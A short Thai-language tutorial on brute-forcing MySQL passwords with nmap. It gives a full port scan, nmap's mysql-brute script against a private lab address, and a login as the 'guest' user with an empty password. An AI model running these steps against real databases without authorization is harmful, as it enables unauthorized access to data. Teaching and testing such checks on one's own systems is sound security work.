บทนำ (Steps)
บทความนี้กล่าวถึงการเดารหัสผ่านของฐานข้อมูล “MYSQL” ซึ่งมี “Port” หมายเลข “3306” โดยใช้ “NMAP” ซึ่งมีความสะดวกและง่ายต่อการใช้งานโดยมีขั้นตอนการทำงานดังต่อไปนี้
ขั้นตอน (Steps)
- ค้นหา “Port” ที่เปิดบริการโดยใช้คำสั่งดังนี้
nmap -p 1-65535 -T4 -A -v 192.168.1.36
- ตรวจสอบ “Port” ของ “MySQL” คือ “3306”
- ใช้ “nmap” สำหรับการ “Brute-force” รหัสผ่าน
nmap --script=mysql-brute 192.168.1.36
- จากผลลัพธ์เราสามารถเจอ 2 “user” ที่มีรหัสผ่านคือค่าว่าง นั้นคือ “root” และ “guest”
- ทดลองเชื่อมต่อโดยใช้คำสั่งดังนี้
mysql -u guest -h 192.168.1.36 show databases;
